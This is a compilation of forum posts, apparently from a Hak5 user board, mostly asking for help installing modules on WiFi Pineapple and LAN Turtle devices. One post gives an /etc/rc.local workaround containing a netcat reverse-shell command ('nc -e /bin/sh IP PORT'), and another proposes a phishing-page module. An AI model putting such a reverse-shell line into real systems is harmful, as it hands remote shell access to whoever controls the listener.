  1. Description With this module you can both traceroute a host and ping all of the hops that the traceroute goes through effectively having traceroute and ping into one simple tool. Features Ping a host and the hops on the way to that host. See packet loss and average ping in ms Traceroute a host and see all the hops it takes to get to that host.
  2. Hi i am trying to run modules in the pineapple nano but when i click start the modules in couple of secounds it is getting stop, i try to install internal storage and sd card as well but getting same error
  3. Selected modules to install. Select install to SD card. Nano reports module installed correctly. Module found on /dev/sdcard/sd1 But module never appears in the installed list. I'm using a 64Gb micro SDXC card.
  4. See the following threads, It appears a lot of the modules start on boot does not work. A workaround for anyone reading this is to add the command in /etc/rc.local For example I enable OpenVPN and start a nc reverse shell and my /etc/rc.local looks like this. Note there is no service or systemctl on the turtle /etc/init.d/openvpn start #sh reverse shell nc -e /bin/sh IP PORT #Add your commands above this line exit 0
  5. Hi, it is my first LAN Turtle, I ordered it as Bundle from the US Store. I did the Update to V2 with Putty & Network cable throug the LanTurtle I am not able to install anything from the Directory. I tryed factory Default reset with the .bin of your Website. Stil the same Problem. In the List of the Modules there is no X by Modulemange. When I select it, it tells me Current Status:Stopped And Bootup Status: Enabled When I go to configure I can select Modules from Directory but nothing is installed in the end. I tryed everthing! Is there a solution?
  6. Hi everyone, When I attempt to go to my Manage Modules section I simply get the thinking Pineapple logo. The device does have internet access and I have performed 2 FULL factory resets on the device. I am also running an SD Card as well. Really need some help. I have not been that happy with this device since the day I received it. Flakey and intermittent in many areas. Especially Recon.
  7. Just got my nano finally and got a nice SD card which formatted from the nano interface. When I try to install any of the modules I get no "install to SD" option.Tried to factory reset and done the same thing several times but I never seem to get the option. Any help would be appreciated ok this is crazy. As soon as I stopped typing this I tried once again to install a module and I got the SD option
  8. Hi All, Just received my LAN turtle today! Only 3 days to the UK! I have updated the software fine, its come back up no problem but I cant install any modules. Follwed the video, gone to module manager > configure > directory > sure you want to connect > Yes It then just takes me straight back to the configure page, never shows any modules I have tried this on my Linux desktop, Windows VM and my Linux laptop and it is the same behaviour on all. Hopefully someone knows what is going on! Cheers
  9. I've been listening to Timothy ferris lately. He interviews people in the top of their field and tends to ask similar questions. One of the questions he asks everyone is, 'What's your morning routine like?'. I thought of this place and I wanted to ask a similar question. After a factory reset or new Pineapple. What are the first few things you make sure to set up? Possible downloads, pivotal settings used most often, ect.. I'm not looking for your life story or secrets but a little insight to quality people. Hopefully someone you don't detest can benefit, even if marginally. Have a beautiful day when you read this.
  10. Hello! I own a Pineapple Nano, and have it setup. Let me run down the list. I am using an Alfa USB to connect to a WiFi connection to forward all traffic to the internet. I have my Management AP, and Public AP (Rogue AP) setup. I am able to connect with a device and my traffic is forwarded. I have the microSD card plugged into the NANO. It has been formatted to EXT4. I rebooted the device, and according to the GUI it is mounted and ready. I load the modules page. Then I click "Get Modules" and the list populates. I then proceed to "Install" any of the modules, let's go with "nmap". It finished the install and succeeds. Then I view the bottom of the page for "Install Modules" and nothing. I then refresh the page and it will not load, I get the forever loading pineapple. And this is where I am at. I am unable to access any other modules. I have reformatted the SD card through the GUI, and through terminal by SSH. And restarted the NANO multiple times. Does anyone have any thoughts on what roadblock I am facing? Is it maybe that the SD card is too large? The SD card is a 32 GB Class 10 card. I am willing to provide additional information, just let me know what you require. I have tried to look around the web and see if anyone else faced the same issue. I couldn't seem to find it, either its buried somewhere in the great wide web, or no one else has had this issue. Thanks, Janosik
  11. Hello! I'm relatively new to the forums, especially considering I just recently got my first Hak5 item 6 days ago for Christmas: the Hak5 Elite Field Kit. Quite a handful at first, but slowly I started to learn how everything works (thanks pocket guide!), and I have just a few questions about my favorite item in the bunch, the Wi-Fi Pineapple Tetra. Where is SSL in the main interface? I'm a high school student, so it's not like I can walk around with a laptop to do penetration testing, therefor I can't use a direct connection via ethernet or serial, nor do I have an android, so I have no micro USB interface. I do, however, have an iPhone, and thus I control the Pineapple Tetra via the management access point. So obviously, my connection to the web server is encrypted via WPA2, however being an aspiring penetration tester, I know that all it takes is someone listening to the handshake (or forcing my re-authentication) and that data, and after some time, the password to both my management AP and root account on the Pineapple is compromised. That's no good! Obviously, I've found ways around this (ssh -fNL 80:localhost:1471 root@172.16.42.1 on the computer, or I use ServerAuditor [now called Termius] to use local port forwarding on my phone), opening an SSH tunnel to route my HTTP traffic, which is close enough to SSL, but it's a pain. I also come from using strictly Apache2, and I'm unsure as to how I should configure Nginx to support SSL. Maybe in a future firmware update, there could be a setup for that? While we're on the topic of SSL, how come SSL is available for the Wi-Fi Pineapple Nano but not the Tetra?? I was very excited to get into some simpler MITM attacks, but was rather disappointed when I only found SSLsplit, which I'm not at all knowledgeable about. All I can tell from it is that it's very unreliable, sometimes working, and sometimes just flat out not. I could definitely be wrong on this next part, but seeing as how the Tetra and Nano share the same firmware (I think??), I don't quite see the point of offering completely different modules when it has nothing to do with the hardware. In my testing lab setup, I have a hidden network that I do some toying with, and was rather befuddled when I wandered into Wi-Fi Client mode to find that there was no option to connect to a hidden network! It wasn't even mentioned in the Help module. Possible future firmware addition? I know that there are multiple ways to broadcast wireless networks (Occupineapple, PineAP, and Networking), but I have yet to find any option in the UI or in the actual machine (via SSH) to host a fully-manageable network, where I control the specifics, such as encryption type (WPA2 is forced in the Management AP, whereas I like to toy with Radius, or even WEP), bandwidth throttling (can't have people stealing all the 3G on a field deployment!), bridging techniques (in Wi-Fi Client Mode, NAT is forced), etc... So yeah, maybe if some administrators happen across this article, they can make some notes for future firmware releases, or if a user comes along, they can enlighten me in some methods of achieving some things listed here. Thank you! Keep up the excellent work!
  12. just got the nano it works great i have had many pineapple but this one is the best Love The Phone app however when do we get the modules it says coming soon i cant use any of the other cool functions outside the old modules standalone ssl strip and the many cool apps just want to know when this will be updated so i can have more fun Thanks !
  13. I am unable to download any modules though internet connectivity exists and I can view available modules. Upon receiving my LANTurtle I immediately checked for and downloaded updates. This updated my firmware from v1 to v2. I could not download modules (didn't try before updating). Since I could not download modules, I followed instructions on the wiki and reflashed. I am running version 2 as downloaded from downloads.lanturtle.com. I successfully: -Acquire IP Address -SSH to Turtle -Change Password -Update Turtle from within turtle shell -Connect and view list of available modules -Successfully reflash with latest firmware (though issues persist) I cannot: -Download Modules I navigate to modules > modulemanager > configure > directory > yes > [select any module (all are displayed)] == message "installed modules:" ...no modules are installed -Start the ModuleManager Service (maybe doesn't matter?) Selecting modules > modulemanager > start == screen indicating press OK or CTRL+C to exit...service does not start Changing bootup status to "enabled" does not start the manager, even after performing above and/or rebooting accessing lower-level shell and entering #start modulemanager provides a message "commands will be executed using /bin/sh" and a job is created, though modulemanager still does not run I feel like this may be a firmware issue but cannot prove it since others have their turtles working on v2. I have a friend who received a turtle in same general time and did not update to v2. He is able to download and run modules without any problems. Could an official download be made available of the old v1 of the firmware as a potential temporary fix/troubleshooting step? Please advise, and thank you in advance for your help,
  14. Hi. I have just received my Wifi Pinapple Nano, and started trying it out. I have connected it to an Android phone using the WiFi Pinapple App. Last firmware installed: 1.0.5. Most of what I have had time to try so far, works nicely. However, I seem unable to download any Modules. When I click on the "Get Modules from WiFiPineapple.com" (on the "Manage Modules" menu), I see the list of available Modules. But then I am unable to do achieve anything. I have tried to click/tap on a module, but nothing happens. How is this supposed to work? Have I missed something? Skib

  16. Ok so I'm kind of sad right now. I figured the Nano would have been like the original, with the ability to get modules and everything. I had no idea they would have to be rewritten. Anyways, I guess my question is: are modules that were available for MKIV going to be available eventually for the Nano? I've seen Evil Portal so far, but (no offense to the dev) I'm not really looking for that. I would love to see reaver and aircrack-type modules. I was so excited to be able to use reaver. I'm a big fan of pen testing (but i am still new to the area). I love working in Linux (i just started using Kali, but I've been using Mint previously). Another quick question too about my nano being connected on my laptop. I use a Bootable USB drive to run Kali. Not sure if that matters, but i finally got it to where i can have my wifi connected to my computer and my computer connected to my nano, but my computer doesn't seem to want to share my connection to the nano. I've done as much research as i could from these forums and have tried multiple IP combinations. My home connection to my wifi router is the generic 192.168.1.1. And the default for the pineapple I'm assuming is 172.16.42.42. But is that the pineapple IP or it's gateway? There's a couple 172.16.x.x IPs I've seen now and one is .42 and one is .1 so does the nano have a gateway? Or is it my ethernet port that is the gateway? Also, the default in wp6.sh for my computer's IP (Host IP) is a 172.16.x.x....why? I'm running a 192.168.x.x network on my router. Is that just the way pineapple sees me cuz of the gateway? My port for the direct connection usb connection is eth1 i believe. But there's also an eth0, which i have no idea why i have a virtual ethernet port. Probably has to do with me being on a USB-run Kali. But the default when i run wp6.sh is eth1. But when i change it to eth0 it stalls on me and nothing happens. So I've tried a bunch of different combinations between IP addresses and eth ports. At least i know my wireless port is wlan0 lol (Also i just thought about this, i do have a USB hub which connects up to 4 USB 3.0 connections, and i am running both the pineapple and Kali through that hub, which leads to the same usb port on my laptop. ..hmmm maybe that's a problem. ..) Anyways, sorry for the long read, i would just appreciate any help i can get. It works fine when i tether into my phone though. No problems there....just a drag i can't run reaver :'(
  17. I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit and went through the instructions set in this link:https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules and all I get after i reload the modules in metasploit is "Failed to load module:........" I have entered in all of the correct file names and locations, and i just cannot think of anything else that could cure this solution. I have even tried copying the files to the parallel spot in the metasploit-framework file, I have tried everything I can possible think of. In short, the msfconsole will not recognize the new module path that I have created through the exploits folder in the .msf4 file, no matter what I try. I have tried reloading the modules, updating the msfconsole, etc. and whenever I tell the msfconsole to show me the new module path all I receive is an Invalid Parameter response and the number of exploits remains the same as if I had never created the new module path. Am I missing any steps to install exploits into metasploit??
  18. Would this be possible? I can see how it would be, but i just wanted to see if one of the DEV's could confirm the complexity of it. It seems simple enough, i think... Find and run the commands that the HTML/JS ui calls, wait till it executes correctly and exits, then execute the next module fetch/get command, wait till completion, so on so forth. For my purposes, a simple static script would work fine. But it would be nice if it could somehow parse a list of availible modules, their install scripts/commands, etc and then prompt the user to choose which modules they want, and then the user waits, presto. If someone could just point me in the right direction and/or get me started, i could in theory have it done fairly quickly ThunderMoose
  19. Hey Folks, I have been pottering around trying to get the USB to work as external storage. I managed to get there in the end but in the process I have some installed modules that will not uninstall when clicking on the 'Remove' button. I have rebooted the Pineapple and inserted each of the 3 USB devices I was testing with but nothing I do remove the installs. I also noticed that when trying to install some of the modules the Pineapple would hang for ages doing nothing (powered with 3rd party battery pack). I'm wondering I there is a way to manually delete the module files or reset the Pineapple somehow. Appreciate any help you can offer.
  20. I really like the way Petertfm worked the random roll mod. Was wondering if anyone has interest in putting a similar style mod together with various phish pages? I'm not much on the sh but would be willing to learn and assist in creating such a mod? R/ Z**
  21. everyone keep posting about there new modules but from where can i download them ? i really want to use them with my pineapple but seems hard to download them
  22. I really would be a nice feature to keep /www/pineapple/modules/moduleList after a firmware upgrade. So you don't have to "reinstall" all infusions again after a upgrade. Besides the modules are still installed on the usb, but moduleList is wiped when upgrading. Or create a checkbox system for the available infusions, so you can install multiple infusions at once ;)
  23. What about a extra navbar beneath the existing one, for pinned modules? :) Maybe with a delicious yellow infusion bg color :P Pins on the existing navbar looks a bit cluttered when having a lot of them.
  24. Is there any guide for writing ar wifi pineapple module or maby a base templete?
  25. I see the list of modules on www.wifipineapple.com, but where can I download them? I see in Telot's instructions for sslstrip that he says "opkg update opkg install sslstrip" Is there something comparable for each module that I can opkg within the Pineapple ssh session to get modules? Does the name here http://cloud.wifipineapple.com/index.php?currentModules match the name that I should opkg install? Thanks!
